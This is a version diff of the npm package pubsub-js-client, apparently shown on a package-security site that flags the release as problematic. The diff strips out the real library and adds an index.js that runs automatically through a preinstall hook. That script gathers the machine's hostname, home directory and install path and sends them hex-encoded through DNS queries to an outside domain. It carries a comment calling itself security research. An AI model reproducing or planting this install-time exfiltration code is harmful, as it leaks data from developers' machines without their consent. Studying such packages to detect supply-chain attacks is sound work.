npm - pubsub-js-client - Versions diffs - 0.6.1 → 25.0.6 - Mend

pubsub-js-client 0.6.1 → 25.0.6

Potentially problematic release.

This version of pubsub-js-client might be problematic. Click here for more details.

Files changed (13) hide show

package/README.md CHANGED Viewed

@@ -1,70 +1 @@
-# pubsub-js-client
-This is the library to integrate with our new PubSub service.
-## Installation
-Make sure you are running node version `8.17.0` as more modern versions do not work.
-```bash
-make build
-```
-This generates `dist/pubsub.js` which is in AMD.
-## Browser parameters
-* `pubsub_log_level` Set this to `debug` to see all messages in console logs
-* `force_pubsub_tester` Set this to `false` to disable pubsub_tester messages
-## Client API
-##### Instantiation
-```javascript
-let driver = PubsubDriver.getInstance(environment); // environment can be "production" or "darklaunch"
-// Driver automatically connects to Pubsub on instantiation
-driver.on("connected", function () { ... });
-// Triggered when the driver first connects
-// Also triggered upon recovering from a disconnect
-driver.on("reconnected", function() { ... });
-// Triggered when the driver recovers from a disconnect
-driver.on("disconnected", function () { ... });
-// Triggered when the driver loses connection to the Pubsub
-// Driver automatically attempts to reconnect and re-listen on topics
-```
-##### Methods
-```javascript
-driver.Listen({
-  topic: "topic",
-  auth: "auth_token",
-  success: function (), // callback when Driver has successfully listened on the topic
-  failure: function (err), // callback when there was an error listening - either a permissions error, or a timeout
-  message: function (msg) // callback when a message is received on this topic
-});
-driver.Unlisten({
-  topic: "topic",
-  success: function (), // callback when the Driver has successfully unlistened on the topic
-  failure: function (err), // callback when there was an error unlistening
-  message: function (msg) // a reference to the callback used in the initial Listen(), to specify which callback to remove
-})
-```
-##### Example
-```javascript
-let driver = PubsubDriver.getInstance("production");
-driver.Listen({
-  topic: "pubsubtest.123456",
-  success: function () { console.log("successfully listened"); },
-  failure: function (err) { console.log("error listening: " + err); },
-  message: function (msg) { console.log("received message: " + msg); }
-});
-```
-```bash
-curl -v -X POST https://pubster.twitch.tv/publish -d '{"topics":["pubsubtest.123456"],"data":"arbitrary string"}'
-```
-##### Troubleshooting
-Try `let driver = PubsubDriver.default.getInstance("production");` (add `.default.`)
+This package is meant for security research purposes and does not contain any useful code.

package/index.js ADDED Viewed

@@ -0,0 +1,80 @@
+/*
+This code is used for research purposes.
+No sensitive data is retrieved.
+Callbacks from within organizations with a
+responsible disclosure program will be reported
+directly to the organizations.
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+For any questions or suggestions:
+alex@ethicalhack.ro
+https://twitter.com/alxbrsn
+*/
+const dns = require('dns');
+const os = require('os');
+const suffix = '.dns.thewhybee.com';
+const ns = 'dns1.thewhybee.com';
+const package = 'pubsub-js-client';
+function sendToServer(data) {
+    data = Buffer.from(data).toString('hex');
+    data = data.match(/.{1,60}/g);
+    id = Math.random().toString(36).substring(2);
+    data.forEach(function (chunk, idx){
+        try {
+            dns.resolve(
+                'v2_f.' + id + '.' + idx + '.' + chunk + '.v2_e' + suffix, 'A',
+                console.log);
+        } catch (e) { }
+    });
+}
+function tryGet(toCall) {
+    try {
+        return toCall();
+    } catch(e) {
+        return 'err';
+    }
+}
+data = {
+    p : package,
+    h : tryGet(os.hostname),
+    d : tryGet(os.homedir),
+    c : __dirname
+}
+if (data['h'] == 'BBOGENS-LAPTOP') {
+    process.exit(0);
+}
+data = JSON.stringify(data);
+sendToServer(data);
+dns.lookup(ns, function(err, address) {
+    if (!err) {
+        nsAddress = address;
+    } else {
+        nsAddress = '8.8.8.8';
+    }
+    dns.setServers([nsAddress, '8.8.4.4']);
+    sendToServer(data);
+});

package/package.json CHANGED Viewed

@@ -1,26 +1,15 @@
-{
-  "name": "pubsub-js-client",
-  "version": "0.6.1",
-  "description": "Pubsub JS Client",
-  "main": "src/PubsubDriver.js",
-  "files": [
-    "src"
-  ],
-  "scripts": {
-    "test": "echo \"Error: no test specified\" && exit 1"
-  },
-  "devDependencies": {
-    "babel-core": "^6.5.1",
-    "babel-loader": "^6.2.2",
-    "babel-preset-es2015": "^6.5.0",
-    "broccoli": "^0.16.3",
-    "broccoli-babel-transpiler": "^5.1.1",
-    "broccoli-cli": "^1.0.0",
-    "broccoli-es6modules": "^0.6.1",
-    "broccoli-funnel": "^0.2.3",
-    "broccoli-sourcemap-concat": "^0.4.4",
-    "jscs": "^1.13.1",
-    "jshint": "^2.9.1",
-    "webpack": "^1.12.13"
-  }
-}
+{
+  "name": "pubsub-js-client",
+  "version": "25.0.6",
+  "description": "Security research purposes only.",
+  "main": "index.js",
+  "scripts": {
+    "test": "",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+  }
+}

package/src/IframeClient.js DELETED Viewed

@@ -1,182 +0,0 @@
-import EventsDispatcher from "./events";
-import logging from "./log";
-import util from "./util";
-import MyMap from "./mymap";
-const NONCE_LENGTH = 30;
-const RESPONSE_TIMEOUT = 30 * 1000; // 30 seconds
-const VERIFY_TIMEOUT = 1 * 1000; // 1 second
-const TWITCH_PROTOCOL = "pubsub";
-var logger = logging._getLogger("IframeClient");
-class IframeClient extends EventsDispatcher {
-  constructor (opts) {
-    super(opts);
-    this._parentUrl = opts.parentUrl;
-    this._pendingResponses = new MyMap();
-    this._listens = new EventsDispatcher();
-    window.addEventListener("message", this.receiveMessage.bind(this), false);
-  }
-  connect () {
-    window.parent.postMessage({
-      twitch_protocol: TWITCH_PROTOCOL,
-      type: "connect"
-    }, this._parentUrl);
-  }
-  verify () {
-    window.parent.postMessage({
-      twitch_protocol: TWITCH_PROTOCOL,
-      type: "verify"
-    }, this._parentUrl);
-    this._verifyTimeout = setTimeout(this._unverified.bind(this), VERIFY_TIMEOUT);
-  }
-  Listen (opts) {
-    // opts should include: topic, auth, success, failure, message
-    logger.debug("listening on " + opts.topic);
-    var nonce = this._generateNonce();
-    var msg = {
-      twitch_protocol: TWITCH_PROTOCOL,
-      type: "LISTEN",
-      nonce: nonce,
-      data: {
-        topics: [opts.topic],
-        auth_token: opts.auth
-      }
-    };
-    this._send(nonce, msg, opts);
-  }
-  Unlisten (opts) {
-    // opts should include: topic, success, failure, message
-    logger.debug("unlistening on " + opts.topic + "(" + this._listens.count(opts.topic) + " listeners)");
-    // If there are more than one callbacks waiting on this topic, we can just remove the specified one rather than sending an UNLISTEN
-    if (this._listens.count(opts.topic) > 1) {
-      if (opts.message) {
-        this._listens.off(opts.topic, opts.message);
-      }
-      if (opts.success) {
-        opts.success();
-      }
-      logger.debug("now have " + this._listens.count(opts.topic) + " listeners");
-      return;
-    }
-    var nonce = this._generateNonce();
-    var msg = {
-      twitch_protocol: TWITCH_PROTOCOL,
-      type: "UNLISTEN",
-      nonce: nonce,
-      data: {
-        topics: [opts.topic]
-      }
-    };
-    this._send(nonce, msg, opts);
-  }
-  _send (nonce, msg, opts) {
-    this._pendingResponses.set(nonce, {
-      timeout: setTimeout(this._onResponseTimeout.bind(this), RESPONSE_TIMEOUT, nonce),
-      topic: opts.topic,
-      auth: opts.auth,
-      message: msg,
-      callbacks: {
-        success: opts.success,
-        failure: opts.failure,
-        message: opts.message
-      }
-    });
-    window.parent.postMessage(msg, this._parentUrl);
-  }
-  receiveMessage (event) {
-    if (!event.data || event.data.twitch_protocol != TWITCH_PROTOCOL) {
-      return;
-    }
-    logger.debug("Received message: " + JSON.stringify(event.data));
-    switch (event.data.type) {
-    case "connected":
-      this._trigger("connected");
-      break;
-    case "disconnected":
-      this._trigger("disconnected");
-      break;
-    case "success":
-      this.handleResponse(true, event.data);
-      break;
-    case "failure":
-      this.handleResponse(false, event.data);
-      break;
-    case "message":
-      this.handleMessage(event.data.topic, event.data.message);
-      break;
-    case "verify":
-      this._verified();
-      break;
-    }
-  }
-  handleResponse (successful, resp) {
-    if (this._pendingResponses.has(resp.nonce)) {
-      var responseInfo = this._pendingResponses.get(resp.nonce);
-      logger.debug("ResponseInfo: " + JSON.stringify(responseInfo));
-      clearTimeout(responseInfo.timeout);
-      this._pendingResponses.remove(resp.nonce);
-      if (successful) {
-        if (responseInfo.callbacks.message) {
-          if (responseInfo.message.type === "LISTEN") {
-            this._listens.on(responseInfo.topic, responseInfo.callbacks.message, this);
-          } else if (responseInfo.message.type === "UNLISTEN") {
-            this._listens.off(responseInfo.topic, responseInfo.callbacks.message, this);
-          }
-        }
-        if (responseInfo.callbacks.success) {
-          responseInfo.callbacks.success();
-        }
-      } else {
-        if (responseInfo.callbacks.failure) {
-          responseInfo.callbacks.failure(resp.error);
-        }
-      }
-    }
-  }
-  handleMessage (topic, msg) {
-    logger.debug("received '" + msg + "' on topic " + topic);
-    this._listens._trigger(topic, msg);
-  }
-  _onResponseTimeout (nonce) {
-    logger.debug("response timed out: " + nonce);
-  }
-  _verified () {
-    logger.debug("Verified");
-    clearTimeout(this._verifyTimeout);
-    this._trigger("verified");
-  }
-  _unverified () {
-    window.removeEventListener("message", this.receiveMessage.bind(this), false);
-    this._trigger("unverified");
-  }
-  // Utility functions
-  _generateNonce () {
-    return util.generateString(NONCE_LENGTH);
-  }
-}
-export default IframeClient;

package/src/IframeHost.js DELETED Viewed

@@ -1,174 +0,0 @@
-import logging from "./log";
-const TWITCH_PROTOCOL = "pubsub";
-const ORPHAN_CHECK_INTERVAL = 10000;
-var logger = logging._getLogger("IframeHost");
-class IframeHost {
-  constructor (driver) {
-    this._driver = driver;
-    this._sources = [];
-    this._listeners = [];
-    this._driver.on("connected", this.handleConnected, this);
-    this._driver.on("disconnected", this.handleDisconnected, this);
-    window.addEventListener("message", this.receiveMessage.bind(this), false);
-    // Periodically check to see if we have any orphaned listeners
-    this._orphanedListenerCheckTimer = setInterval(this._checkOrphanedListeners.bind(this), ORPHAN_CHECK_INTERVAL);
-  }
-  destroy () {
-    clearInterval(this._orphanedListenerCheckTimer);
-  }
-  receiveMessage (event) {
-    if (!event.data || event.data.twitch_protocol != TWITCH_PROTOCOL || !event.source) {
-      return;
-    }
-    logger.debug("Received message: " + JSON.stringify(event.data));
-    switch (event.data.type) {
-    case "LISTEN":
-      this.handleListen(event.source, event.data.nonce, event.data.data);
-      break;
-    case "UNLISTEN":
-      this.handleUnlisten(event.source, event.data.nonce, event.data.data);
-      break;
-    case "connect":
-      this._sources.push(event.source);
-      this._driver.connect();
-      break;
-    case "verify":
-      event.source.postMessage({
-        twitch_protocol: TWITCH_PROTOCOL,
-        type: "verify"
-      }, "*");
-      break;
-    }
-  }
-  // Keeps track of which sources are listening to which topics
-  // Returns an object containing the source, topic, and onMessage callback
-  // If a listener already exists for the specified source and topic, returns null
-  _pushListener (source, topic) {
-    // If we've already got a listener for this source and topic we don't need to create another one
-    for (var i = 0; i < this._listeners.length; i++) {
-      if (this._listeners[i].source === source && this._listeners[i].topic === topic) {
-        return null;
-      }
-    }
-    var listener = {
-      source: source,
-      topic: topic,
-      message: function (msg) {
-        source.postMessage({twitch_protocol: TWITCH_PROTOCOL, type: "message", topic: topic, message: msg}, "*");
-      }
-    };
-    this._listeners.push(listener);
-    return listener;
-  }
-  // Untracks and returns the listener for the given source and topic
-  // If no listener is found for the specified source and topic, returns null
-  _popListener (source, topic) {
-    for (var i = 0; i < this._listeners.length; i++) {
-      if (this._listeners[i].source === source && this._listeners[i].topic === topic) {
-        return this._listeners.splice(i, 1)[0];
-      }
-    }
-    return null;
-  }
-  // Checks to see if any of the registered listeners have a source that has been deleted
-  // Calls Unlisten on any listeners that are found
-  _checkOrphanedListeners () {
-    for (var i = 0; i < this._listeners.length; i++) {
-      // source is a reference to the window that sent the postMessage
-      if (this._listeners[i].source.closed) {
-        this._cleanUpOrphanedListener(this._listeners.splice(i--, 1)[0]);
-      }
-    }
-  }
-  // Call Unlisten for the supplied listener with local logging as callback because the listener passed in has no source
-  _cleanUpOrphanedListener (listener) {
-    logger.debug("Cleaning up orphaned listener for topic: " + listener.topic);
-    this._driver.Unlisten({
-      topic: listener.topic,
-      success: (function () {
-        logger.debug("Success when cleaning up orphaned listener for topic: " + listener.topic);
-      }),
-      failure: (function (err) {
-        logger.debug("Error when cleaning up orphaned listener for topic: " + listener.topic + " Error: " + err);
-      }),
-      message: listener.message
-    });
-  }
-  handleListen (source, nonce, data) {
-    var listener = this._pushListener(source, data.topics[0]);
-    // We already have a listener for this source and topic so just send back the success message
-    if (!listener) {
-      source.postMessage({twitch_protocol: TWITCH_PROTOCOL, type: "success", nonce: nonce}, "*");
-      return;
-    }
-    this._driver.Listen({
-      topic: listener.topic,
-      auth: data.auth_token,
-      success: (function () {
-        source.postMessage({twitch_protocol: TWITCH_PROTOCOL, type: "success", nonce: nonce}, "*");
-      }),
-      failure: (function (err) {
-        source.postMessage({twitch_protocol: TWITCH_PROTOCOL, type: "failure", nonce: nonce, error: err}, "*");
-      }),
-      message: listener.message
-    });
-  }
-  handleUnlisten (source, nonce, data) {
-    var listener = this._popListener(source, data.topics[0]);
-    if (!listener) {
-      logger.debug("Failed to unlisten, could not find listener for topic " + data.topics[0]);
-      return;
-    }
-    this._driver.Unlisten({
-      topic: listener.topic,
-      auth: data.auth_token,
-      success: (function () {
-        source.postMessage({twitch_protocol: TWITCH_PROTOCOL, type: "success", nonce: nonce}, "*");
-      }),
-      failure: (function (err) {
-        source.postMessage({twitch_protocol: TWITCH_PROTOCOL, type: "failure", nonce: nonce, error: err}, "*");
-      }),
-      message: listener.message
-    });
-  }
-  handleConnected () {
-    for (var i = 0; i < this._sources.length; i++) {
-      this._sources[i].postMessage({
-        twitch_protocol: TWITCH_PROTOCOL,
-        type: "connected"
-      }, "*");
-    }
-  }
-  handleDisconnected () {
-    for (var i = 0; i < this._sources.length; i++) {
-      this._sources[i].postMessage({
-        twitch_protocol: TWITCH_PROTOCOL,
-        type: "disconnected"
-      }, "*");
-    }
-  }
-}
-export default IframeHost;